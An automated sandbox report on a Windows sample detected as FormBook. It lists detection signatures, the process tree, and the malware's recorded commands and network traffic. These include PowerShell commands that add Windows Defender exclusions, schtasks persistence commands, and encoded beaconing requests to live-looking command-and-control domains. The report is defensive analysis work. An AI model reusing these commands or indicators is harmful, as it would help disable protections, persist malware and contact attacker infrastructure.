Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0t7MXNEfCg.exe

Overview

General Information

Sample name:0t7MXNEfCg.exe
renamed because original name is a hash value
Original sample name:a61ebf9a0414d3871e05be2c7599cee230b5bfd8198c447f276b372c46cd70c9.exe
Analysis ID:1634632
MD5:a682f30885758fe33f03d157985ca8cd
SHA1:d4261970559775da60dc7e5336fa71baead43add
SHA256:a61ebf9a0414d3871e05be2c7599cee230b5bfd8198c447f276b372c46cd70c9
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 0t7MXNEfCg.exe (PID: 6660 cmdline: "C:\Users\user\Desktop\0t7MXNEfCg.exe" MD5: A682F30885758FE33F03D157985CA8CD)
    • powershell.exe (PID: 6892 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\0t7MXNEfCg.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7084 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2440 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7124 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp476F.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 5900 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • nufnwZ9IW.exe (PID: 4916 cmdline: "C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\ICvX7WbHb46W.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • EhStorAuthn.exe (PID: 3552 cmdline: "C:\Windows\SysWOW64\EhStorAuthn.exe" MD5: 0C9245FDD67B14B9E7FBEBB88C3A5E7F)
          • nufnwZ9IW.exe (PID: 5720 cmdline: "C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\QSqzL0Hw.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 4076 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • HrovwwypYVlFWB.exe (PID: 6448 cmdline: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe MD5: A682F30885758FE33F03D157985CA8CD)
    • schtasks.exe (PID: 6156 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp69AD.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7144 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • svchost.exe (PID: 1720 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.3311044242.0000000003210000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000F.00000002.3313948379.0000000004F30000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.1092434861.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000010.00000002.3315893341.00000000057F0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000007.00000002.1094683253.00000000011D0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              7.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\0t7MXNEfCg.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\0t7MXNEfCg.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\0t7MXNEfCg.exe", ParentImage: C:\Users\user\Desktop\0t7MXNEfCg.exe, ParentProcessId: 6660, ParentProcessName: 0t7MXNEfCg.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\0t7MXNEfCg.exe", ProcessId: 6892, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\0t7MXNEfCg.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\0t7MXNEfCg.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\0t7MXNEfCg.exe", ParentImage: C:\Users\user\Desktop\0t7MXNEfCg.exe, ParentProcessId: 6660, ParentProcessName: 0t7MXNEfCg.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\0t7MXNEfCg.exe", ProcessId: 6892, ProcessName: powershell.exe
                Sigma detected: Suspicious Add Scheduled Task Parent
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp69AD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp69AD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe, ParentImage: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe, ParentProcessId: 6448, ParentProcessName: HrovwwypYVlFWB.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp69AD.tmp", ProcessId: 6156, ProcessName: schtasks.exe
                Sigma detected: Suspicious Schtasks From Env Var Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp476F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp476F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\0t7MXNEfCg.exe", ParentImage: C:\Users\user\Desktop\0t7MXNEfCg.exe, ParentProcessId: 6660, ParentProcessName: 0t7MXNEfCg.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp476F.tmp", ProcessId: 7124, ProcessName: schtasks.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\0t7MXNEfCg.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\0t7MXNEfCg.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\0t7MXNEfCg.exe", ParentImage: C:\Users\user\Desktop\0t7MXNEfCg.exe, ParentProcessId: 6660, ParentProcessName: 0t7MXNEfCg.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\0t7MXNEfCg.exe", ProcessId: 6892, ProcessName: powershell.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 616, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1720, ProcessName: svchost.exe

                Persistence and Installation Behavior

                barindex
                Sigma detected: Scheduled temp file as task from temp location
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp476F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp476F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\0t7MXNEfCg.exe", ParentImage: C:\Users\user\Desktop\0t7MXNEfCg.exe, ParentProcessId: 6660, ParentProcessName: 0t7MXNEfCg.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp476F.tmp", ProcessId: 7124, ProcessName: schtasks.exe

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: 0t7MXNEfCg.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://www.publicblockchain.xyz/lp5v/?Fvul3V4=7yIrJbTkKXcZ3P0KGr/Koo24hNJO/SgHVLeScBlqQKklxLvgBpJLKramFPJZQILeALwCbIGrsNSTHBUkDfJ2CmxW9ppwC0dBf2zpzGJzUmZuPq9zPg==&Y4dP=e0rhoTXHczCAvira URL Cloud: Label: malware
                Source: http://www.quo1ybjmkhdqljoz.top/19my/?Fvul3V4=joqcG+fZarPVQJ7S+4ZxvY2vtL9RD/Utjvk256BrCJs1qxhBI0rorZURoJn8TQLNAH2gxgdx7fps/CVRzREwYN3vr/HATwYeIEwtGpG51RR/HtBrWQ==&Y4dP=e0rhoTXHczCAvira URL Cloud: Label: malware
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeAvira: detection malicious, Label: TR/Kryptik.ckmuj
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeReversingLabs: Detection: 87%
                Multi AV Scanner detection for submitted file
                Source: 0t7MXNEfCg.exeVirustotal: Detection: 75%Perma Link
                Source: 0t7MXNEfCg.exeReversingLabs: Detection: 87%
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.3311044242.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.3313948379.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1092434861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3315893341.00000000057F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1094683253.00000000011D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1094905703.00000000044D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.3313869495.0000000004EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3313912525.0000000005FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

                Compliance

                barindex
                Detected unpacking (overwrites its own PE header)
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeUnpacked PE file: 0.2.0t7MXNEfCg.exe.c70000.0.unpack
                Source: 0t7MXNEfCg.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0t7MXNEfCg.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: EhStorAuthn.pdbGCTL source: RegSvcs.exe, 00000007.00000002.1092861532.0000000000948000.00000004.00000020.00020000.00000000.sdmp, nufnwZ9IW.exe, 0000000D.00000002.3312326160.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb, source: EhStorAuthn.exe, 0000000F.00000002.3312040086.000000000355A000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.000000000576C000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000000.1158675658.00000000033BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1394289093.000000001313C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000007.00000002.1093299321.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000003.1092408126.0000000004DED000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000003.1094405634.0000000004F95000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314113769.00000000052DE000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314113769.0000000005140000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000007.00000002.1093299321.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000003.1092408126.0000000004DED000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000003.1094405634.0000000004F95000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314113769.00000000052DE000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314113769.0000000005140000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: EhStorAuthn.pdb source: RegSvcs.exe, 00000007.00000002.1092861532.0000000000948000.00000004.00000020.00020000.00000000.sdmp, nufnwZ9IW.exe, 0000000D.00000002.3312326160.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: EhStorAuthn.exe, 0000000F.00000002.3312040086.000000000355A000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.000000000576C000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000000.1158675658.00000000033BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1394289093.000000001313C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nufnwZ9IW.exe, 0000000D.00000000.1013826041.000000000013F000.00000002.00000001.01000000.0000000B.sdmp, nufnwZ9IW.exe, 00000010.00000002.3311041959.000000000013F000.00000002.00000001.01000000.0000000B.sdmp
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 4x nop then jmp 0B029FC6h0_2_0B029591
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 4x nop then mov eax, dword ptr [ebp-28h]0_2_0B02A758
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 4x nop then jmp 0AB193A6h8_2_0AB18971

                Networking

                barindex
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.031233435.xyz
                Source: DNS query: www.publicblockchain.xyz
                Source: DNS query: www.multo.xyz
                Source: global trafficTCP traffic: 192.168.2.9:53457 -> 162.159.36.2:53
                Source: Joe Sandbox ViewIP Address: 144.76.229.203 144.76.229.203
                Source: Joe Sandbox ViewIP Address: 23.29.115.2 23.29.115.2
                Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /wuv4/?Y4dP=e0rhoTXHczC&Fvul3V4=2OIhpue752EZ90/IvIOXIVPMrLw233bVQ3MPFxfgDOdW1S8/arxwgjd2lghQxPvp+gghQveeWAHTWLXRjOMCWPWMwADxip7rw5uuigB1f8O0pqS8IA== HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.loonerverse.appUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /esw3/?Fvul3V4=STIHOi9CYFClakjV40da904kxu04fSTg15TVg9rRTe6RIWG0ngBkAmIpkbb4lCp8vZ5PbVNvG6nxo4giTwSjUUdGf0sNI49aD0h2s8CD3wRIEi64PA==&Y4dP=e0rhoTXHczC HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.primepath.netUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /frae/?Y4dP=e0rhoTXHczC&Fvul3V4=KcpF0TU1XcHay6iLVQUXGDReeie9um98isUAx1G3kizVKrvyU48KAqtS1EQtSF28ARfeHCcJEKKBEr6rT3kkp32obJR11ZCNpl9EOmwTtKX1kru6/Q== HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.031233435.xyzUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /19my/?Fvul3V4=joqcG+fZarPVQJ7S+4ZxvY2vtL9RD/Utjvk256BrCJs1qxhBI0rorZURoJn8TQLNAH2gxgdx7fps/CVRzREwYN3vr/HATwYeIEwtGpG51RR/HtBrWQ==&Y4dP=e0rhoTXHczC HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.quo1ybjmkhdqljoz.topUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /lp5v/?Fvul3V4=7yIrJbTkKXcZ3P0KGr/Koo24hNJO/SgHVLeScBlqQKklxLvgBpJLKramFPJZQILeALwCbIGrsNSTHBUkDfJ2CmxW9ppwC0dBf2zpzGJzUmZuPq9zPg==&Y4dP=e0rhoTXHczC HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.publicblockchain.xyzUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /piuf/?Fvul3V4=YCNZp8d5iXit/W0AorWaWt7d4xAAmtdp36jPY/C6OJXNmYBtndpnLj0XSaiYBStqm/SDNtVWLS5HnYm1prURp0Y/ZkKzdGOT5N9GRD58mtome4/e3g==&Y4dP=e0rhoTXHczC HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.multo.xyzUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ty1w/?Y4dP=e0rhoTXHczC&Fvul3V4=DmU+BbsPdbeZ2oth7eqVH4IxkOLk6Zp/22nZgrH0plfMc3nD0zI48kMWd79FMLpDsXRjkkg28/qOhccmO28DNDD1L3WSnlRb++KDtRPwHjQRI9RaJQ== HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.tkloqr.infoUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /acnz/?Fvul3V4=4AOqIRL3pTX0nNGi+lOPSRSyx/iWc+VNgOr/RdoxqxyE7WxJ0cGBT5xqcnG7h+9L/Gcmqaxm6woK1RcVOdtmiwYFptrc3wJWSbhePUsK6Xy3HPLGHQ==&Y4dP=e0rhoTXHczC HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.streaay.liveUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /qnz1/?Y4dP=e0rhoTXHczC&Fvul3V4=R+Oteo3rh3f7nhB2gSiRNKBizK43zE0qallxSves6Vu4hZ6h0oWNPYtUeAXf+7K/BC0XOkjfNAq1UFaiNKAvTsJITEpbbAWoIaW5yxMtSr/CIMXx3A== HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.77zhibo.netUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /bio5/?Fvul3V4=7nMcQ+p/VAEQ2azQobfLLk4wRClPro4nkTeWIV8mecaktUDEYNaH1yi6Gw2pgnszfL4ShPP5kx9f65xk5DOH9sW5HfQfVtVhiUSIIV3Eq7C7wPzE3A==&Y4dP=e0rhoTXHczC HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.thefounder.ceoUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
